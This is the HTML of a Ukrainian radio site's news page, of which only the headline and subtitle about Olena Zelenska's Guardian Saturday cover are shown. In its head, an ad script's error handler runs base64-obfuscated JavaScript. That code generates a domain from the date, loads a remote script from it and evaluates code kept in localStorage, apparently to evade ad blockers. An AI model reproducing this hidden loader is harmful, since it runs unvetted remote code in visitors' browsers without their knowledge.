<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />

<link rel="shortcut icon" href="/assets/images/favicons/favicon.ico?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="57x57" href="/assets/images/favicons/apple-icon-57x57.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="/assets/images/favicons/apple-icon-114x114.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="/assets/images/favicons/apple-icon-72x72.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="/assets/images/favicons/apple-icon-144x144.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="60x60" href="/assets/images/favicons/apple-icon-60x60.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="120x120" href="/assets/images/favicons/apple-icon-120x120.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="76x76" href="/assets/images/favicons/apple-icon-76x76.png?v=49" />
<link rel="apple-touch-icon-precomposed" sizes="152x152" href="/assets/images/favicons/apple-icon-152x152.png?v=49" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-196x196.png?v=49" sizes="196x196" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-96x96.png?v=49" sizes="96x96" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-64x64.png?v=49" sizes="64x64" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-48x48.png?v=49" sizes="48x48" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-32x32.png?v=49" sizes="32x32" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-24x24.png?v=49" sizes="24x24" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-16x16.png?v=49" sizes="16x16" />
<link rel="icon" type="image/png" href="/assets/images/favicons/favicon-128x128.png?v=49" sizes="128x128" />
<meta name="msapplication-square70x70logo" content="/assets/images/favicons/mstile-70x70.png?v=49" />
<meta name="msapplication-square150x150logo" content="/assets/images/favicons/mstile-150x150.png?v=49" />
<meta name="msapplication-wide310x150logo" content="/assets/images/favicons/mstile-310x150.png?v=49" />
<meta name="msapplication-square310x310logo" content="/assets/images/favicons/mstile-310x310.png?v=49" />
<meta name="msapplication-TileColor" content="#ffffff" />

<link rel="stylesheet" href="/assets/css/app.min.css?v=49">
<link rel="stylesheet" href="/assets/css/fotorama.css?v=49">
<script></script>
<script>
        var isMobile = function () {
    return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
};

var lazyLoadScripts = function (func, time) {
    window.addEventListener('load', function () {
        setTimeout(func, time);
    });
}

if (isMobile()) {
                                            } else {
    var node6778 = document.getElementById("MIXADV_6778");
    if( node6778 )
    {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6778&r="+Math.random();
        node6778.parentNode.appendChild(script);
        script.onerror = function(){
            window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY3NzggLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjc3OC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY3NzgucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY3NzguaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY3NzgiKSkgfSwgNTAwMCk7ICA7fTsg") );
        }
    }
}    </script>
<![if !IE]>
<script src="/assets/js/jquery-3.6.0.min.js?v=49"></script>
<![endif]>
<script src="/assets/js/lib.top.min.js?v=49"></script>
<![if IE]>
<script src="/assets/js/html5shiv.min.js?v=49"></script>
<script src="/assets/js/jquery-1.12.0.min.js?v=49"></script>
<script src="/assets/js/respond.min.js?v=49"></script>
<script src="/assets/js/rem.min.js?v=49"></script>
<![endif]>
<title data-ajax-replace="true">Олена Зеленська знялася для британського The Guardian - Радіо Максимум</title>
<meta data-ajax-replace="true" name="title" content="Олена Зеленська знялася для британського The Guardian - Радіо Максимум" />
<meta data-ajax-replace="true" name="description" content="Олена Зеленська з'явилася на обкладинці британської газети The Guardian Saturday. Крім цього, перша леді України дала відверте інтерв'ю іноземному виданню." />
<link data-ajax-replace="true" rel="canonical" href="https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720" />
<link data-ajax-replace="true" rel="amphtml" href="https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720/amp">
<meta data-ajax-replace="true" name="author" content='maximum.fm'>
<meta data-ajax-replace="true" name="apple-itunes-app" content="app-id=797596046">
<meta data-ajax-replace="true" name="google-play-app" content="app-id=com.radio24.ua">
<meta data-ajax-replace="true" property="og:type" content="website" />
<meta data-ajax-replace="true" property="og:title" content="Олена Зеленська знялася для британського The Guardian - Радіо Максимум" />
<meta data-ajax-replace="true" property="og:description" content="Олена Зеленська з'явилася на обкладинці британської газети The Guardian Saturday. Крім цього, перша леді України дала відверте інтерв'ю іноземному виданню." />
<meta data-ajax-replace="true" property="og:site_name" content="Радіо Максимум" />
<meta property="og:image" content="https://maximum.fm/uploads/media_news/2022/06/62af15a41680b109800024.png?w=1200&amp;h=675&amp;il&amp;q=60&amp;output=jpg" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@MAXIMUMFM_ua" />
<meta name="twitter:creator" content="@MAXIMUMFM_ua" />
<meta data-ajax-replace="true" property="og:url" content="https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720" />
<meta data-ajax-replace="true" property="fb:admins" content="100002197865474" />
<meta data-ajax-replace="true" property="fb:app_id" content="899863283383667" />
<meta data-ajax-replace="true" property="fb:pages" content="100876706667611" />
<script type="application/ld+json">
            {
              "@context": "http://schema.org",
              "@type": "NewsArticle",
              "mainEntityOfPage":{
                "@type": "WebPage",
                "@id": "https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720"
              },
              "headline": "Олена Зеленська знялася для британського The Guardian",
              "image": {
                "@type": "ImageObject",
                "url": "https://maximum.fm/uploads/media_news/2022/06/62af15a41680b109800024.png?w=1200&amp;h=675&amp;il&amp;q=60&amp;output=jpg",
                "width": 1200,
                "height": 675
              },
              "datePublished": "2022-06-19 16:22:00",
              "dateModified": "2022-06-20 17:07:44",
                "author": {
                    "@type": "Organization",
                    "name": "maximum.fm"
                },

                "publisher": {
                    "@type": "Organization",
                    "name": "maximum.fm",
                    "email": "music@maximum.fm",
                    "url": "https://maximum.fm/",
                    "logo": {
                        "@type": "ImageObject",
                        "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png?v=49",
                        "width": 60,
                        "height": 60
                    }
                }
            }

    </script>
<script type="application/ld+json">
        {
         "@context": "http://schema.org",
         "@type": "BreadcrumbList",
         "itemListElement": [{
                    "@type": "ListItem",
                    "position": 1,
                    "name": "Радіо Максимум",
                    "item": "https://maximum.fm/"
                },{
                    "@type": "ListItem",
                    "position": 2,
                    "name": "Шоу-біз",
                    "item": "https://maximum.fm/shou-biz_t22786"
                }

                            ,{
                    "@type": "ListItem",
                    "position": 3,
                    "name": "Зірки",
                    "item": "https://maximum.fm/zirki_t23798"
                }
                        ]
        }
    </script>

<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W8D5HV"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-W8D5HV');</script>

<link rel="manifest" href="/manifest.json">
<link rel="preconnect" href="https://membrana-cdn.media/" crossorigin>
<link rel="dns-prefetch" href="https://membrana-cdn.media/">
<script async="async" src="https://www.googletagservices.com/tag/js/gpt.js"></script>
<script async="async" src="https://cdn.membrana.media/mfm/ym.js"></script>
<style>
        .nts-video {height: calc((100vw - 30) / 16 * 9); max-height: 360px}
        @media (max-width: 480px) {.nts-video {height: calc(100vw / 16 * 9)}  }
        .nts-video-wrapper {padding-top: 10px; padding-bottom: 20px}
        .nts-video-label {font-size: 12px; font-family: "Helvetica Neue", Arial, sans-serif; line-height: 12px; text-transform: uppercase; color: #999; text-align: center}
        .nts-float-container {z-index: 2!important;}
    </style>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('head');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://cdn.gravitec.net/storage/7e008d1c9fd1a6f52c684c44732eb9f0/client.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>
</head>
<body>
<script>
    var dfpAdSlots = [];
</script>
<header class="radio">
<div class="top-section">
<div class="row  red-pla">
<div class="logo-wrapper">
<a href="/" class="header-logo ajaxLink" data-url="/">
</a>
</div>
<div class="all-stations-wrapper stations-wrapper">
<div class="all-stations">
<a id="otherStationsButton" class="open-next-station" aria-expanded="true" style="display: none;">
</a>
<div class="other-stations station-list" id="otherStations" aria-expanded="true">
<div class="next-station-text">Радіостанції</div>
<div class="station-wrapper station-item">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
</button>
<a href="/archive" class="ajaxLink" data-url="/archive" title="ONAIR" data-toggle="otherStations otherStationsButton" data-toggler=".active">
<div class="station-name">ONAIR</div>
</a>
</div>
</div>
<div class="station-wrapper station-wrapper-top">
<button class="play-btn play" data-station-name="onair" data-station-id="4" data-station-display-name="ONAIR"></button>
<div class="station-name">
<div>
слухати
<span> ONAIR</span>
</div>
<a href="" id="audio-adv" class="link-to-adv hidden" target="_blank">Перейти на сайт рекламодавця</a>
</div>
</div>
</div>
</div>
<div class="column on-air-wrapper">
<div class="playing-songs-wrapper">
<a data-toggle="openNextSongs openNextSongsButton" data-toggler=".active" id="openNextSongsButton" class="open-next-songs" aria-expanded="true" data-b="efqd6m-b" style="">
</a>
<div class="next-songs-wrapper" id="openNextSongs" data-toggler=".active" aria-expanded="true" data-b="iteq36-b">
<div class="next-songs-text">Далі в ефірі:</div>
<div class="next-songs-list"></div>
</div>
<div class="song-wrapper now-playing-song"></div>
</div>
</div>
<div class="options-wrapper column medium-4 large-4 small-5 " id="profile-wrapper">
<div class="volume show-for-large">
<div class="volume-sign up"></div>
<div class="volume-slider-wrapper ">
<div class="slider volume-progress" data-slider data-initial-start="100" data-start="0">
<span class="volume-progress-handle" data-slider-handle role="slider" tabindex="1" style="left: 100%;"></span>
<span class="volume-progress-fill" data-slider-fill></span>
<input type="hidden">
</div>
</div>
</div>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="webcamera-wrapper">
<div class="row">
<div class="small-12 columns">
<h2>
ВЕБ-КАМЕРА
</h2>
</div>
<div class="medium-8 small-12 columns">
<div class="iframe-wrapper">
<video id="webcamera-player" class="video-js vjs-default-skin tube-css vjs-16-9" preload="auto" poster="https://maximum.fm/assets/images/maximum-new-red-2020-10.svg?v=49" controls playsinline>
</video>
</div>
</div>
<div class="medium-4 small-12 columns other-video-wrapper">
<div class="other-video">
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/06/62b06be7b62a0068964493.jpg?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/pro-nezlamnist-ukrayinskogo-duhu-ml-tandem-prezentuvali-patriotichnu-robotu-geroyam_n204733" target="_self" title="" class=" ajaxLink" href="/pro-nezlamnist-ukrayinskogo-duhu-ml-tandem-prezentuvali-patriotichnu-robotu-geroyam_n204733">
Про незламність українського духу: ML Tandem презентували патріотичну роботу "Героям"
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 16:19
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/06/62b0381606e9d049810681.png?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/vovk-i-vovkulaki-bijci-pokazali-spokijnu-zustrich-z-hizhim-zvirom--video_n204726" target="_self" title="" class=" ajaxLink" href="/vovk-i-vovkulaki-bijci-pokazali-spokijnu-zustrich-z-hizhim-zvirom--video_n204726">
Вовк і "вовкулаки": бійці показали спокійну зустріч з хижим звіром – відео
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 12:22
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/06/62b02df5d37bb451241144.jpg?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/dzhej-lo-nazvala-donku-nebinarnoyu-osoboyu-pid-chas-spilnogo-vistupu_n204725" target="_self" title="" class=" ajaxLink" href="/dzhej-lo-nazvala-donku-nebinarnoyu-osoboyu-pid-chas-spilnogo-vistupu_n204725">
Джей Ло назвала доньку небінарною особою під час спільного виступу
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 11:26
</footer>
</div>
</div>
<div class="video-item">
<div class="img-wrap">
<img src="/uploads/media_news/2022/06/62af1b82680b1126797921.jpg?w=110&amp;h=77&amp;il&amp;q=60&amp;output=jpg" alt="">
</div>
<div class="text">
<h3 class="title">
<a data-url="/zirkovij-kulinar-rozpoviv-yak-po-osoblivomu-zapekti-kartoplyu-pokrokovij-recept-u-video_n204722" target="_self" title="" class=" ajaxLink" href="/zirkovij-kulinar-rozpoviv-yak-po-osoblivomu-zapekti-kartoplyu-pokrokovij-recept-u-video_n204722">
Зірковий кулінар розповів, як по-особливому запекти картоплю: покроковий рецепт у відео
<i class="video-icon">відео</i>
</a>
</h3>
<footer>
сьогодні, 19:33
</footer>
</div>
</div>
</div>
<button class="load-more load-more-news">
arrow
</button>
</div>
</div>
</div>
<div class="bottom-section">
<div class="row  menu-wrapper">
<div class="small-12 columns">
<div class="row">
<div class="small-12 columns">
<div class="mobile-header" style="">
<div class="hamburger hamburger--collapse">
<span class="hamburger-box">
<span class="hamburger-inner"></span>
</span>
</div>
<a href="/" class="logo ajaxLink" data-url="/">
<img src="/assets/images/logo-maximum-2020-10.svg?v=49" style="width: 100px; height: 54px" alt="Mobile logo">
</a>
<div id="popup" data-user="-1">
<button class="lock flat-button" data-toggle="login-popup" aria-controls="login-popup" id="login-form-show"></button>
<div class="login-popup bounce-in fast" data-submenu id="login-popup" data-toggler data-animate="scale-in-up scale-out-down">
<button class="icon-button close" data-toggle="login-popup" aria-controls="login-popup"></button>
<div class="title">Вхід через соцмережі</div>
<ul class="social-login-buttons">
<a href="/login/facebook" alt="Sign in with Facebook">
<li class="facebook"></li>
</a>
<a href="/login/twitter" alt="Sign in with twitter">
<li class="twitter"></li>
</a>
<a href="/login/google" alt="Sign in with Google">
<li class="google"></li>
</a>
</ul>
<div class="title">Вхід</div>
<form class="login-popup-form" role="form" action="/login_check" method="post">
<label style="display: none" id="form-error-label"></label>
<input class="log-input" type="text" placeholder="Логін" id="username" name="_username" value="" required="required">
<input class="log-input" type="password" placeholder="Пароль" id="password" name="_password">
<div class="other-login-options">
<input type="checkbox" id="remember_me" name="_remember_me" />
<label for="remember_me">
Запам'ятати мене
</label>
<a id="forgot-password">Забули пароль?</a>
</div>
<div class="enter-login-options">
<a data-url="/register" title="Зареєструватись" href="/register" class="icon-button ajaxLink closeBtn">Зареєструватись</a>
<button class="border-button submit-login" id="login-btn-submit" data-toggle="login-popup" aria-controls="login-popup">увійти
</button>
</div>
</form>
</div>
</div>
</div>
<div class="menu">
<div class="tagName-novini menu-item ">
<a href="/novini_t2" class="menu-link ajaxLink" data-url="/novini_t2">
Новини
</a>

<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/ukrayina_t22822" class="tagName-ukrayina sub-menu-item ajaxLink" data-url="/ukrayina_t22822">
Україна
</a>
<a href="/svit_t15" class="tagName-svit sub-menu-item ajaxLink" data-url="/svit_t15">
Світ
</a>
<a href="/sport_t22784" class="tagName-sport sub-menu-item ajaxLink" data-url="/sport_t22784">
Спорт
</a>
<a href="/kultura_t10" class="tagName-kultura sub-menu-item ajaxLink" data-url="/kultura_t10">
Культура
</a>
<a href="/foto_t6" class="tagName-foto sub-menu-item ajaxLink" data-url="/foto_t6">
Фото
</a>
<a href="/video_t7" class="tagName-video sub-menu-item ajaxLink" data-url="/video_t7">
Відео
</a>
</div>
</div>

</div>
<div class="tagName-shou-biz menu-item ">
<a href="/shou-biz_t22786" class="menu-link ajaxLink" data-url="/shou-biz_t22786">
Шоу-біз
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zirki_t23798" class="tagName-zirki sub-menu-item ajaxLink" data-url="/zirki_t23798">
Зірки
</a>
<a href="/moda_t22837" class="tagName-moda sub-menu-item ajaxLink" data-url="/moda_t22837">
Мода
</a>
<a href="/kino_t22736" class="tagName-kino sub-menu-item ajaxLink" data-url="/kino_t22736">
Кіно
</a>
<a href="/seriali_t23561" class="tagName-seriali sub-menu-item ajaxLink" data-url="/seriali_t23561">
Серіали
</a>
<a href="/televizijni-shou_t23799" class="tagName-televizijni-shou sub-menu-item ajaxLink" data-url="/televizijni-shou_t23799">
ТБ-шоу
</a>
<a href="/muzichni-novinki_t23831" class="tagName-muzichni-novinki sub-menu-item ajaxLink" data-url="/muzichni-novinki_t23831">
Музичні новинки
</a>
</div>
</div>
</div>
<div class="tagName-lajfstajl menu-item ">
<a href="/lajfstajl_t23832" class="menu-link ajaxLink" data-url="/lajfstajl_t23832">
Лайфстайл
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/zdorovya_t22746" class="tagName-zdorovya sub-menu-item ajaxLink" data-url="/zdorovya_t22746">
Здоров&#039;я
</a>
<a href="/yizha_t23025" class="tagName-yizha sub-menu-item ajaxLink" data-url="/yizha_t23025">
Їжа
</a>
<a href="/kurjozi_t22751" class="tagName-kurjozi sub-menu-item ajaxLink" data-url="/kurjozi_t22751">
Курйози
</a>
<a href="/podorozhi_t22743" class="tagName-podorozhi sub-menu-item ajaxLink" data-url="/podorozhi_t22743">
Подорожі
</a>
<a href="/goroskop_t23796" class="tagName-goroskop sub-menu-item ajaxLink" data-url="/goroskop_t23796">
 Гороскоп
</a>
<a href="/testi_t22841" class="tagName-testi sub-menu-item ajaxLink" data-url="/testi_t22841">
Тести
</a>
</div>
</div>
</div>
<div class="tagName-tehnologiyi menu-item ">
<a href="/tehnologiyi_t18" class="menu-link ajaxLink" data-url="/tehnologiyi_t18">
Техно
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/gadzheti_t22745" class="tagName-gadzheti sub-menu-item ajaxLink" data-url="/gadzheti_t22745">
Гаджети
</a>
<a href="/avto_t22770" class="tagName-avto sub-menu-item ajaxLink" data-url="/avto_t22770">
Авто
</a>
<a href="/pobutova-tehnika_t23833" class="tagName-pobutova-tehnika sub-menu-item ajaxLink" data-url="/pobutova-tehnika_t23833">
Побутова техніка
</a>
<a href="/internet_t22835" class="tagName-internet sub-menu-item ajaxLink" data-url="/internet_t22835">
Інтернет
</a>
<a href="/igri_t23443" class="tagName-igri sub-menu-item ajaxLink" data-url="/igri_t23443">
Ігри
</a>
<a href="/kosmos_t22839" class="tagName-kosmos sub-menu-item ajaxLink" data-url="/kosmos_t22839">
Космос
</a>
</div>
</div>
</div>
<div class="tagName-populyarne menu-item ">
<a href="/populyarne_t23834" class="menu-link ajaxLink" data-url="/populyarne_t23834">
Популярне
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/nostalgiya_t23821" class="tagName-nostalgiya sub-menu-item ajaxLink" data-url="/nostalgiya_t23821">
Ностальгія
</a>
<a href="/cikavinki_t23802" class="tagName-cikavinki sub-menu-item ajaxLink" data-url="/cikavinki_t23802">
Цікаві новини
</a>
<a href="/ukrayinska-muzika_t23685" class="tagName-ukrayinska-muzika sub-menu-item ajaxLink" data-url="/ukrayinska-muzika_t23685">
Українська музика
</a>
<a href="/privitannya_t23757" class="tagName-privitannya sub-menu-item ajaxLink" data-url="/privitannya_t23757">
Привітання
</a>
<a href="/recepti_t23098" class="tagName-recepti sub-menu-item ajaxLink" data-url="/recepti_t23098">
Рецепти
</a>
<a href="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="tagName- sub-menu-item ajaxLink" data-url="https://maximum.fm/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
З днем народження
</a>
</div>
</div>
</div>
<div class="tagName-pro-radio menu-item ">
<a href="/pro-radio_t23861" class="menu-link ajaxLink" data-url="/pro-radio_t23861">
Про радіо
</a>
<div class="sub-menu-wrapper">
<div class="sub-menu">
<a href="/staff" class="tagName- sub-menu-item ajaxLink" data-url="/staff">
Ведучі
</a>
 <a href="/radiocovermap" class="tagName- sub-menu-item ajaxLink" data-url="/radiocovermap">
Карта покриття
</a>
<a href="/contacts" class="tagName- sub-menu-item ajaxLink" data-url="/contacts">
Контакти
</a>
<a href="/archive" class="tagName- sub-menu-item ajaxLink" data-url="/archive">
Що звучало в ефірі
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="main-content">
<div class="reveal" style="position: relative;" id="register-start" data-reveal>
<span class="replace-h3">Вітаємо на сайті Радіо Максимум!</span>
<p class='lead'>На вказану електронну адресу було надіслано повідомлення для підтвердження реєстрації</p>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="resetting-start" data-reveal>
<form action="/resetting/send-email" method="POST" class="fos_user_resetting_request" id="fos_user_resetting_request" novalidate>
<span class="replace-h4">Форма для відновлення паролю</span>
<div>
<input type="text" class="base-input" id="username_email" name="username" required="required" placeholder="Введіть логін або електронну пошту!" autofocus />
<p id="error-message" style="display: none; color: red;">Такий логін або адреса електронної пошти не зареєстровані в системі!</p>
</div>
<div class="large-4 float-right ">
<button type="submit" class="border-button " value="Надіслати">Надіслати</button>
</div>
</form>
<span class="replace-h5" id="show-message-from-resetting"></span>
<button class="close-button" data-close aria-label="Close reveal" type="button">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="reveal" style="position: relative;" id="user-update" data-reveal>
<span class="replace-h4" style="text-align: center">Вітаємо, Ваші дані успішно оновлено!</span>
<button class="close-button" data-close aria-label="Close reveal" type="button" onClick="window.location.reload()">
<span aria-hidden="true">&times;</span>
</button>
</div>
<script>
        if (typeof window.widget !== 'undefined') {
            window.widget.changeParam('newsId', '204720');
        }
    </script>
<div class="white">
<div id="loadNewsContainerData" data-news-id="204720" data-limit="1" data-offset="0" data-url="/get-scroll-news">
</div>
<div class="content-wrapper  row" data-title="Олена Зеленська знялася для британського The Guardian" data-image="https://maximum.fm/uploads/media_news/2022/06/62af15a41680b109800024.png?w=424&amp;h=239&amp;il&amp;q=60&amp;output=jpg" data-author="Назар Сорока" data-path="/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720" data-tags="Шоу-біз, Зірки, Олена Зеленська">
<div class="columns small-12 medium-12 large-8">
<div>
<div id="ontheioViewTacking" data-tags="Шоу-біз,Зірки,Олена Зеленська,Фото,Новини" class="news-content-wrapper" data-title="Олена Зеленська знялася для британського The Guardian - Радіо Максимум" data-path="/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720" data-id="204720">
<div class="top-tags-wrapper">
<a href="/vijna_t22973" class="top-tag">
<i class="flash"></i>війна</a>
<a href="/kalush_t23930" class="top-tag">
<i class="flash"></i>Kalush</a>
</div>
<div class="news-title"><h1>Олена Зеленська знялася для британського The Guardian</h1>
</div>
<ul class="statistic">
<li class="date">
<time datetime="2022-06-19 16:22">
Вчора, 16:22
</time>
</li>
<li class="watchers">214</li>
</ul>
<div class="news-photo-container">
<div class="news-photo">
<img src="/uploads/media_news/2022/06/62af15a41680b109800024.png?w=1200&amp;h=675&amp;il&amp;q=80&amp;output=jpg" title="Олена Зеленська - 1" alt="Олена Зеленська - фото 1">
<div class="photo-credits">Олена Зеленська
/ instagram
</div>
<ul class="news-sharing ">
<li class="facebook-count counter">
<a id="facebook" data-news-url="https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720" href="javascript: void(0);" class="facebook inPage soc_counter_fb_204720">
</a>
</li>
<li class="twitter-count counter">
<a id="twitter" data-news-url="https://maximum.fm/olena-zelenska-znyalasya-dlya-britanskogo-the-guardian_n204720" data-news-name="Олена Зеленська знялася для британського The Guardian" href="javascript: void(0);" class="twitter inPage soc_counter_tw_204720">
</a>
</li>
</ul>
</div>
<div class="news-photo-sideblock show-for-medium">
<ul class="popular-news">
<li class="title">Популярне</li>
<li><a class="ajaxLink" data-url="/bilshe-yisti-fitnes-trenerka-zdivuvala-poradami-yak-pokrashchiti-formu_n201176" title="" href="/bilshe-yisti-fitnes-trenerka-zdivuvala-poradami-yak-pokrashchiti-formu_n201176">Більше їсти: фітнес-тренерка здивувала порадами, як покращити форму</a></li>
<li><a class="ajaxLink" data-url="/10-koloritnih-ukrayinskih-sliv-pro-lito-yaki-zbagatyat-vashe-movlennya_n178643" title="" href="/10-koloritnih-ukrayinskih-sliv-pro-lito-yaki-zbagatyat-vashe-movlennya_n178643">10 колоритних українських слів про літо, які прикрасять ваше мовлення</a></li>
</ul>
</div>
</div>
<div class="news-content news-content-block">
<p class="subtitle"><strong>Олена Зеленська з'явилася на обкладинці британської газети The Guardian Saturday. Крім цього, перша леді України дала відверте інтерв'ю іноземному виданню.</strong></p>
<style>
    @media (max-width: 640px) {
        #mobileBrandingPlace {
            padding-bottom: 56.21%;
            z-index: 9;
            margin: 10px 0;
            order: -2;
        }
        #mobileBranding {
            margin: 0 !important;
        }
    }
</style>
<div class="mobileBrandingPlace" id="mobileBrandingPlace"></div>
